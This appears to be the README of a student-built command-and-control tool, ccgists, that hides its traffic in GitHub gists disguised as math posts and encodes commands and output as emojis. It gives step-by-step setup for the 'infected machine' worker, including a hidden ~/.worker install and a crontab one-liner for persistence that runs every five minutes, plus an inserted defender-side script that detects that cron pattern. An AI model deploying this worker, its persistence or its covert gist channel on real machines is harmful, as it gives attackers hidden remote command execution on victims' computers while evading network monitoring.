A Command & Control infrastructure disguised in gists, math, and emojis 📝

andrsdt/ccgists
Table of Contents
  1. About The Project
  2. Getting Started
  3. Usage
  4. License
  5. Contact

About The Project

This repository contains the code for the ccgists project, which is composed of two independent components:

  • controller: a Python script that provides centralized management of the C2 infrastructure. It lets the attacker list the available agents, send commands to them and read the output of those commands.
  • worker: a Python script that runs periodically on the infected machine and communicates with the controller to report its state. If there are pending commands, it executes them and sends the output back to the controller.

The communication is done entirely through GitHub Gists. There is a gist disguised as a Pi Day celebration where infected computers post their status. When the attacker sends a command to an infected machine, the controller creates a gist disguised as a mathematician's biography that is used as the thread for that communication. Commands sent to that machine and their outputs are encoded as emojis.

Getting Started

We will first set up the infected machines, and then the controller.

Both the infected machines and the controller authenticate their requests with a GitHub personal access token. The token is used for all gist operations, and gists are the only communication channel between the infected machines and the controller. A token for my account can be found in the report in Google Docs for the subject, but note that it will create private gists on my account that won't be visible from the professor's account. It is better to provide your own token; you can create one in the GitHub settings. Only the scope for managing gists is required.

Installation

Infected machines

  1. Download and unzip the latest release from the releases page
```sh
wget -q https://github.com/andrsdt/ccgists/releases/latest/download/worker.tar.gz
mkdir ~/.worker; tar -xf worker.tar.gz -C ~/.worker; rm worker.tar.gz
cd ~/.worker
```
  2. Create a virtual environment
```sh
python3 -m venv .venv
source .venv/bin/activate
```
  3. Install the dependencies
```sh
pip install -r requirements.txt
```
  4. Create the .env file with the GitHub token
```sh
echo "GITHUB_TOKEN=<secret_token>" > .env
```
  5. Run the worker
```sh
python3 ./dist/main.py
```

The script can be run with `python3 ./worker/dist/main.py` and performs its routine tasks once per execution. It can be scheduled to run periodically (for example, every 5 minutes) with crontab by running the following bash command:

```sh
crontab -l | { cat; echo "*/5 * * * * $HOME/.worker/.venv/bin/python3 $HOME/.worker/dist/main.py"; } | crontab -
```
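As an added defender-side example (not part of this repository's code), the following script audits crontab lines for the persistence pattern the command above creates: a job firing every few minutes that runs an interpreter on a script kept in a hidden directory. The crontab text, user names and paths are constructed samples.

```python
import re

# Constructed sample crontab (not a real capture); the third and fifth
# entries mirror the scheduling pattern this README uses for the worker.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /home/alice/.worker/.venv/bin/python3 /home/alice/.worker/dist/main.py
30 * * * * /home/alice/bin/backup.sh
* * * * * python3 /home/bob/.cache/upd/main.py
"""

CRON_RE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")
HIDDEN_DIR_RE = re.compile(r"/\.[^/\s]+/")  # a path component starting with '.'
INTERPRETER_RE = re.compile(r"(^|/)(python[0-9.]*|perl|sh|bash)(\s|$)")


def minute_interval(minute_field, hour_field):
    """Interval in minutes for an 'every N minutes, all day' schedule, or None
    when the entry is not of that form (fixed minute, restricted hours, ...)."""
    if hour_field != "*":
        return None
    if minute_field == "*":
        return 1
    m = re.fullmatch(r"\*/(\d+)", minute_field)
    return int(m.group(1)) if m else None


def suspicious_cron_entries(crontab_text, max_interval=10):
    """Return [(line, interval)] for entries that run at least every
    max_interval minutes AND invoke an interpreter on a script inside a
    hidden directory, the combination the worker install above produces."""
    findings = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_RE.match(line)
        if not m:
            continue  # environment lines such as MAILTO=..., or malformed
        interval = minute_interval(m.group(1), m.group(2))
        command = m.group(6)
        if interval is None or interval > max_interval:
            continue
        if HIDDEN_DIR_RE.search(command) and INTERPRETER_RE.search(command):
            findings.append((line, interval))
    return findings


if __name__ == "__main__":
    for line, interval in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"every {interval} min: {line}")
```

Run it against `crontab -l -u <user>` output for each account on a host to surface jobs worth a closer look; legitimate jobs that happen to match can be allow-listed by path.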

Controller

The controller's entry point is a Python script in controller/src/main.py. The setup is similar to the script for infected machines:

  1. Download and unzip the latest release from the releases page
```sh
wget https://github.com/andrsdt/ccgists/releases/latest/download/controller.tar.gz
mkdir ccgists; tar -xf controller.tar.gz -C ccgists
cd ccgists
```
  2. Create a virtual environment
```sh
python3 -m venv .venv
source .venv/bin/activate
```
  3. Install the dependencies
```sh
pip install -r requirements.txt
```
  4. Create the .env file with the GitHub token
```sh
echo "GITHUB_TOKEN=<secret_token>" > .env
```
  5. Run the controller
```sh
python3 ./src/main.py
```


Usage

The script is intuitive to use and shows a menu with the available options. The menu lists the available agents, and the user can select one of them to send commands to it. These commands are processed the next time the infected machine runs the worker script.

For any questions about usage, do not hesitate to contact me.


License

Distributed under the MIT License. See LICENSE.txt for more information.


Contact

Andrés Durán - @andresdt - andrez#0077 - [email protected]

Project Link: https://github.com/andrsdt/ccgists
